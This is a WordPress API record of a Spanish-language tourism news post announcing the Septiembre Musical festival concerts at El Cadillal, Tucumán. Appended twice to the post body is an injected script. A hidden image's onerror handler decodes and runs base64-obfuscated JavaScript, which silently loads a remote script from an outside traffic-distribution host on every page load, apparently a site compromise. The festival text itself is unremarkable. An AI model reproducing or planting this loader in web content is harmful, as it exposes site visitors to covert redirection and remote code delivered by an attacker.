{"id":1433,"date":"2022-09-05T23:55:38","date_gmt":"2022-09-06T02:55:38","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1433"},"modified":"2025-08-14T00:36:21","modified_gmt":"2025-08-14T03:36:21","slug":"el-cadillal-se-llenara-de-sonido-y-color-durante-el-septiembre-musical","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1433","title":{"rendered":"El Cadillal se llenar\u00e1 de sonido y color durante el Septiembre Musical"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#0e6219\"><strong><em>El tradicional encuentro que impulsa Cultura en coordinaci\u00f3n con el Ente Tucum\u00e1n Turismo brindar\u00e1 una cartelera de lujo en el destino.<\/em><\/strong><\/h3>\n\n\n\n<p>El Complejo Tur\u00edstico Puerto Argentino de El Cadillal ser\u00e1 la casa de la m\u00fasica durante todo un mes en el marco de la 62\u00b0 edici\u00f3n del&nbsp;<strong>Septiembre Musical<\/strong>, el ic\u00f3nico festival internacional que organiza el&nbsp;<strong>Ente Cultural de Tucum\u00e1n<\/strong>&nbsp;(ECT) y que cuenta con la coordinaci\u00f3n del&nbsp;<strong>Ente Tucum\u00e1n Turismo<\/strong>&nbsp;(ETT).<\/p>\n\n\n\n<p>El evento, que se extender\u00e1 hasta el pr\u00f3ximo 2 de octubre, reunir\u00e1 a m\u00e1s de 3.200 artistas locales, nacionales e internacionales en 42 escenarios de distintos puntos de la provincia y, en la villa tur\u00edstica, ofrecer\u00e1 una destacada cartelera de shows gratuitos que amenizar\u00e1n las jornadas en su paisaje imponente.<\/p>\n\n\n\n<p>En representaci\u00f3n del ETT, la vicepresidenta&nbsp;<strong>Elena Colombres Garmendia<\/strong>, particip\u00f3 del lanzamiento del festival que se realiz\u00f3 este martes en el Teatro San Mart\u00edn, encabezado por el vicepresidente de la&nbsp;<strong>Honorable Legislatura de Tucum\u00e1n&nbsp;<\/strong>(HLT),&nbsp;<strong>Regino Amado<\/strong>, junto a la secretaria general de la Gobernaci\u00f3n,&nbsp;<strong>Silvia P\u00e9rez<\/strong>, y al titular del ECT,&nbsp;<strong>Mart\u00edn Ruiz Torres<\/strong>.&nbsp;<\/p>\n\n\n\n<p>\u201cEl Septiembre Musical es uno de los eventos que pone de manifiesto el desarrollo y la jerarqu\u00eda de la cultura tucumana. Tener una serie de shows del m\u00e1s alto nivel durante 30 d\u00edas es algo espectacular y, por supuesto, eso alimenta la oferta tur\u00edstica de la provincia\u201d, expres\u00f3 Colombres Garmendia sobre la relevancia del festival. En este sentido, explic\u00f3 que este a\u00f1o \u201centre las miradas innovadoras que plantea, utiliza uno de los escenarios tur\u00edsticos m\u00e1s destacados como El Cadillal, apoy\u00e1ndose en su moderna infraestructura y en su marco natural privilegiado, lo que le da una impronta \u00fanica al evento y, a la vez, a nuestros destinos\u201d.&nbsp;&nbsp;<\/p>\n\n\n\n<p>En la misma l\u00ednea, el jefe de Planificaci\u00f3n del ETT,&nbsp;<strong>Marcos Valdez<\/strong>, sostuvo que \u201cen esta edici\u00f3n, Cultura nos propuso una serie de recitales en El Cadillal, aprovechando todas las instalaciones del Complejo y las comodidades que ofrece el espacio\u201d.<\/p>\n\n\n\n<p>El Anfiteatro Los Tucu Tucu&nbsp;albergar\u00e1 as\u00ed una vasta variedad de artistas locales y nacionales, con shows todos los s\u00e1bados y domingos a partir de las 18 horas. \u201cDesde Turismo siempre apoyamos estas iniciativas porque generan una oferta atractiva durante los fines de semana, momento en el que recibimos a una mayor cantidad de p\u00fablico, sumando a la experiencia del destino para estos turistas\u201d, agreg\u00f3.<\/p>\n\n\n\n<p><strong>La cartelera completa<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>3 de septiembre: Plazoleta All Stars<\/strong><\/li><li><strong>4 de septiembre:<\/strong>\u00a0Murga Pa\u2019 Ladrar Fino<\/li><li><strong>10 de septiembre:<\/strong>\u00a0Los Peces Gordos<\/li><li><strong>11 de septiembre:<\/strong>\u00a0Misty Soul Choir de C\u00f3rdoba<\/li><li><strong>17 de septiembre:<\/strong>\u00a0The Worms<\/li><li><strong>18 de septiembre:<\/strong>\u00a0Koufequin de la Ciudad Aut\u00f3noma de Buenos Aires<\/li><li><strong>24 de septiembre:<\/strong>\u00a0Cantata \u201cEl Ingl\u00e9s\u201d<\/li><li><strong>25 de septiembre:<\/strong>\u00a0Los Raviolis de la Ciudad Aut\u00f3noma de Buenos Aires<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"1434\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM-1024x682.jpeg\" alt=\"\" class=\"wp-image-1434\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM-1024x682.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM-1068x712.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM-630x420.jpeg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"1435\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM1-1024x682.jpeg\" alt=\"\" class=\"wp-image-1435\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM1-1024x682.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM1-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM1-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM1-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM1-1068x712.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM1-630x420.jpeg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM1.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"1436\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/CulturaSM3-1024x682.jpeg\" alt=\"\" class=\"wp-image-1436\"\/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.institucionalturismotuc.gob.ar\/noticias\/noticia\/485\/El+Cadillal+se+llenar%C3%A1+de+sonido+y+color+durante+el+Septiembre+Musical\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"444\" height=\"68\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_19-8-2022_201429_www.institucionalturismotuc.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1338\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_19-8-2022_201429_www.institucionalturismotuc.gob_.ar_.jpeg 444w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_19-8-2022_201429_www.institucionalturismotuc.gob_.ar_-300x46.jpeg 300w\" sizes=\"(max-width: 444px) 100vw, 444px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El tradicional encuentro que impulsa Cultura en coordinaci\u00f3n con el Ente Tucum\u00e1n Turismo brindar\u00e1 una cartelera de lujo en el destino. El Complejo Tur\u00edstico Puerto Argentino de El Cadillal ser\u00e1 la casa de la m\u00fasica durante todo un mes en el marco de la 62\u00b0 edici\u00f3n del&nbsp;Septiembre Musical, el ic\u00f3nico festival internacional que organiza el&nbsp;Ente [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1437,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13,18],"tags":[],"class_list":{"0":"post-1433","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1433"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1433"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1433\/revisions"}],"predecessor-version":[{"id":7363,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1433\/revisions\/7363"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1437"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1433"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1433"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1433"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}